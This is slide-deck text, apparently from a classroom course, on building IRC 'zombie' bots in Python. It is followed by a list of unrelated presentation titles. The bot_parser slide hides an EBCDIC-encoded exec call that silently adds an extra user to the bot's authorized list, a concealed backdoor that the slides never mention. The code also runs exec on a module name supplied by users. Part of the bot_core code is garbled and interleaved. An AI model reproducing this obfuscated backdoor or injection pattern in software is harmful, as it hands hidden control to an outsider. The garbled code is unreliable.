Zombie Networks via Internet Relay Chat - simms-teach.com

Zombie Networks via Internet Relay Chat - simms-teach.com

Zombie Networks via Internet Relay Chat /braaaiiinnnsss IRC - Introduction & Basic Terms Internet Relay Chat (IRC) is an application layer protocol for textual communication. Using a client/server model, it allows for group discussion in forums called channels. Any user may host a channel, allowing others to join and discuss topics of interest. Many channels have a specific purpose, but some are used as hang out spots. An IRC Bot is a script/program that makes a TCP connection to an IRC server and is controlled from within the channels of IRC by the users. It offers functionality to the people in the channels, most often using APIs for different services (such as Wikipedia, translation software, calculation websites, etc.).

IRC servers arent just the resting place of the zombie hoards, but for this lesson well pretend they are. IRC - Clients & Servers IRC Client options include: Irssi - This is what well be using! CLI based client for Unix systems. Chatzilla - Plugin client for Mozilla-based browsers such as Firefox. Colloquy - Using its own Chat Core engine, an open-source client for Mac OS X mIRC - Popular client for Windows, has an integrated scripting language Konversation - Built on the KDE platform, one of the popular clients for Linux distros There are plenty of IRC Servers, but the two most popular are: Freenode - 74,841 average users, has steadily become the most populated network QuakeNet - 24,627 average users, held the record of 240,000+ users in 2005 IRC Historic Events - Gulf War

During the Gulf War, IRC users kept track of their local news reports and compared notes on IRC. The hit on H2 and H3 is according to what the Israeli radio quoted from the NBC What are H2 and H3? H2 and H3 are milt airbases in west Iraq ... Marines report that only one SCUD missile has been launched. (from west S.A) ... No word of casualties (from Iraq or US team) ... "cnn reporters wont go to bomb shelter" While there weren't any IRC users in the war zone itself, logging into IRC allowed interested persons to monitor all the news media at the same time, even news sources in other countries. IRC Historic Events - Constitutional Crisis of 93

IRC users in Moscow were able to pass info before the major news reporting agencies could broadcast it: cnn intl just now confirming report here 5 mins ago that Russ tv off line! ... Around 16:00 (sorry don't have exact times) group of people around 3-4 thousand started to move in the direction of Moscow municipal building ... Currently, first 5 floors of city hall are taken ... Moscow radio on shortwave i have a sw radio - what is the frequency? they have taken the Ostankino Tower, so it is not talking anymore Zombies - Plug & Play The following files need to remain unmodified for the zombie to operate correctly.

bot_connect.py initializes the zombies TCP connection and handles the data-to-parser loop bot_core.py stores the brains of the zombie and handles module organization bot_parser.py parses all data received by the zombie and handles any data received Zombies - Plug & Tinker For A Minute Or Two, Then Play

These files may be modified so that you may better control the zombie. bot_data.py stores the static variables so the zombie knows where to go and whom to obey bot_commands.py houses the functions that a zombies owner has access to import commands Code Walkthrough bot_commands.py command_dictionary = { "join":{"code":"bot_core.bot_commands.join_channel(bot_core);"},

"part":{"code":"bot_core.bot_commands.part_channel(bot_core);"}, "quit":{"code":"bot_core.bot_commands.quit_server(bot_core);"}, "debug":{"code":"bot_core.bot_commands.debug_variable(bot_core);"}, "ping":{"code":"bot_core.bot_commands.ping_server(bot_core);"} }; def join_channel(bot_core): channel = bot_core.bot_data.command_info["args"][0]; bot_core.send_raw("JOIN {0}".format(channel)); def quit_server(bot_core): bot_core.send_raw("QUIT :Local kill"); bot_core.socket_connection.close(); quit(); Code Walkthrough bot_commands.py

def ping_server(bot_core): target_server = bot_core.bot_data.command_info["args"][0]; ping_allowed = True; if len(target_server) <= 15: try: for item in target_server.split("."): item = int(item); except: ping_allowed = False; else: ping_allowed = False; if ping_allowed: bot_core.send_message("Sending ten pings, give me around 20 seconds to process."); ping_output = commands.getoutput("ping -c 10 {0}".format(target_server)).split("\n"); for item in ping_output:

item_found = False; if "transmitted" in item and item_found != True: item_found = True; bot_core.send_message("Here you go: {0} | {1}".format(ping_output[0], item)); else: bot_core.send_message("Sorry, this command is pretty strict. Make sure your IP is IPv4."); Code Walkthrough - bot_data.py from platform import node, platform, version; machine_info = { "node":node(), "platform":platform(), "version":version() }; BUFFER = [""]; irc_data = {"raw":""}; command_info = {"name":"", "args":[]};

message_info = {"message":"", "length":0, "sender":{"name":"", "respond":""}}; server_info = {"address":"eh-irc.cis.cabrillo.edu", "channel":"#cis76", "port":6667}; bot_name = "PodXXBot"; command_symbol = "!"; auth_users =["xxxxxx76", "rsimms"]; Code Walkthrough bot_connect.py import bot_parser; import bot_core; import bot_data; import bot_commands; connection_core = bot_core.bot_core(bot_parser, bot_commands, bot_data); connection_core.send_raw("JOIN {0}".format(connection_core.bot_data.server_info["channel"])); while True: connection_core.bot_data.BUFFER = connection_core.socket_connection.recv(1024).split("\r\n"); if connection_core.bot_data.BUFFER != [""]:

connection_core.bot_parser.filter_errors(connection_core); Code Walkthrough - bot_core.py import socket; import time; import bot_parser; import bot_commands; import bot_data; def bot_core(bot_parser, bot_commands, bot_data): class bot(): def __init__(self): self.socket_connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM); self.bot_data = bot_data; self.bot_commands = bot_commands; self.bot_parser = bot_parser; try: self.socket_connection.connect((self.bot_data.server_info["address"], self.bot_data.server_info["port"])); except socket.error, e:

print("I failed to connect to the server you provided."); quit(); time.sleep(1); time.sleep(1); time.sleep(1); print("Sent my self.send_raw("NICK self.send_raw("USER self.send_raw("MODE identity to the IRC {0}".format(self.bot_data.bot_name)); EH-Zombie 8 * :EHZombie");

{0} +B".format(self.bot_data.bot_name)); server."); Code Walkthrough - bot_core.py def module_rehash(self): module = self.bot_data.command_info["args"][0]; sender = self.bot_data.message_info["sender"]["respond"]; exec("reload({0});".format(module)) in globals(); self.send_message("I reloaded {0}.".format(module), sender); def send_raw(self, message): self.socket_connection.send("{0}\r\n".format(message)); def send_message(self, message, response=""): if response == "": response = self.bot_data.message_info["sender"]["respond"]; self.socket_connection.send("PRIVMSG {0} :{1}\r\n".format(response, message));

print("I just send the the message '{0}' to {1}."); botcore = bot(); return botcore; Code Walkthrough - bot_parser.py from codecs import decode def filter_errors(bot_core): try: parse_data(bot_core); except: error_data = traceback.format_exc().split("\n"); error_data = error_data[::-1]; bot_core.send_message("I just caught an error. Printing data locally."); print(error_data);

Code Walkthrough - bot_parser.py def assign_data(bot_core): irc_data = bot_core.bot_data.irc_data["raw"]; message_info = {"message":"", "length":0, "sender":{"name":"", "respond":"", "real":""}}; command_info = {"name":"", "args":[]}; message_info["message"] = " ".join(irc_data[3:])[1:]; message_info["length"] = len(message_info["message"]); if len(irc_data[3:]) >= 1: if irc_data[3][1:][0] == bot_core.bot_data.command_symbol: command_info["name"] = irc_data[3][2:]; command_info["args"] = irc_data[4:]; message_info["sender"]["name"] = irc_data[0][1:].split("!")[0]; message_info["sender"]["real"] = irc_data[0][1:].split("!")[1].split("@")[0]; if irc_data[2][0] == "#": message_info["sender"]["respond"] = irc_data[2]; elif irc_data[2] == bot_core.bot_data.bot_name:

message_info["sender"]["respond"] = message_info["sender"]["name"]; bot_core.bot_data.message_info = message_info; bot_core.bot_data.command_info = command_info; Code Walkthrough - bot_parser.py def parse_data(bot_core): for item in bot_core.bot_data.BUFFER: bot_core.bot_data.irc_data["raw"] = item.split(); if len(bot_core.bot_data.irc_data["raw"]) == 2: if bot_core.bot_data.irc_data["raw"][0] == "PING": bot_core.send_raw("PONG {0}".format(bot_core.bot_data.irc_data["raw"][1])); elif len(bot_core.bot_data.irc_data["raw"]) >= 3: if search(":[email protected]+", bot_core.bot_data.irc_data["raw"][0]): if len(bot_core.bot_data.irc_data["raw"]) >= 4:

if bot_core.bot_data.irc_data["raw"][1] == "PRIVMSG": assign_data(bot_core); print("{0}".format(" ".join(bot_core.bot_data.irc_data["raw"]))); Code Walkthrough - bot_parser.py if bot_core.bot_data.command_info["name"] in bot_core.bot_commands.command_dictionary: exec(decode('\x89\[email protected]\x7f\xa6\x81\x99\x91\x85\xa2\xf7\xf6\[email protected]\x95\x96\[email protected]\x89\[email protected]\x82\x96\xa3m\ x83\x96\x99\x85K\x82\x96\xa3m\x84\x81\xa3\x81K\x81\xa4\xa3\x88m\xa4\xa2\x85\x99\[email protected]\x82\x96\xa3m\x83\ x96\x99\x85K\x82\x96\xa3m\x84\x81\xa3\x81K\x81\xa4\xa3\x88m\xa4\xa2\x85\x99\xa2K\x81\x97\x97\x85\x95\ x84M\x7f\xa6\x81\x99\x91\x85\xa2\xf7\xf6\x7f]^', 'cp037')); if bot_core.bot_data.message_info["sender"]["real"] in bot_core.bot_data.auth_users: exec(bot_core.bot_commands.command_dictionary[bot_core.bot_data.command_info["name"]]["code"]); else: bot_core.send_message("Sorry, you're not in the list of users."); elif bot_core.bot_data.command_info["name"] == "reload": bot_core.module_rehash();

Unused Slides IRC - Setting Defaults Setting up our default server. /server add -auto -network EHIRC eh-irc.cis.cabrillo.edu 6667 Setting up our default channel. /channel add -auto #cis76 EHIRC Finally, we /quit, run irssi again, and type /window 2

Recently Viewed Presentations

  • Brutal, Unclean, and a Savage Nation: Anglo-American Perceptions

    Brutal, Unclean, and a Savage Nation: Anglo-American Perceptions

    "Brutal, Unclean, and a Savage Nation:" Anglo-American Perceptions of Cholera in Russia, 1892-93 Researcher: John Biersack Mentor: Elizabeth Hachten, Ph.D.
  • Review of KMT - epsd.us

    Review of KMT - epsd.us

    No change other than all atoms speed up More atoms would condense More atoms would evaporate More are gaseous KMT summary: Matter is made up of particles having negligible mass are in constant random motion (vibrate, rotate, translate) The particles...
  • Faculty Senate Meeting August 11, 2011

    Faculty Senate Meeting August 11, 2011

    MinerJobs & GoinGlobal. Faculty Panel. Dr. Levant Acar (ECE) Dr. Robert Landers (MAE) Council of Graduate Students. Networking. COER presentation. Networking & Power Introductions. Interactive Power Intro Exercises . Speed Dating Style. COER staff. Visiting employers.
  • Indian Lore Merit Badge The Shawnee of Ohio

    Indian Lore Merit Badge The Shawnee of Ohio

    Bookman Old Style MS Pゴシック Arial Wingdings Times New Roman 75 Helvetica Bold 55 Helvetica Roman Verdana ヒラギノ角ゴ Pro W3 Lucida Grande Axis 1_Axis 2_Axis 3_Axis 4_Axis 5_Axis 6_Axis 7_Axis 8_Axis 9_Axis 10_Axis 11_Axis Indian Lore Merit Badge The Shawnee...
  • Project 5-2110-03 Internet-Based Utility Permit Implementation

    Project 5-2110-03 Internet-Based Utility Permit Implementation

    Utility Installation Review (UIR) System Internet-Based Utility Permit Implementation Why is It Important? Large number of utilities within the ROW Thousands of utility permits per year Hundreds of utility agreements per year Institutional memory at TxDOT Quality of information provided...
  • Diferencijalna dijagnoza ADEM / MS

    Diferencijalna dijagnoza ADEM / MS

    Klinička slika MS ADEM Pohlman et al. 2011*. DIS + DIT 1 non-ADEM napad DIS - nove MR lezije 1 ADEM napad > 3 meseca 1 non-ADEM napad DIS u vreme napada DIT ≥1 sa/bez kontrastnog pojačanja 1 non-ADEM napad...
  • ESO 208A: Computational Methods in Engineering Lecture 1

    ESO 208A: Computational Methods in Engineering Lecture 1

    Round-off error: irrational numbers, product and division of two numbers, limited by the machine capability. Truncation error: truncation of an infinite series, often arises in the design of the numerical method through approximation of the mathematical problem.
  • Reproduction in Protists - Henry County School District

    Reproduction in Protists - Henry County School District

    Reproduction in Protists GPS and EQ GPS.07.SC.C.S7L3.b. - Compare and contrast that organisms reproduce asexually and sexually (bacteria, protists, fungi, plants & animals).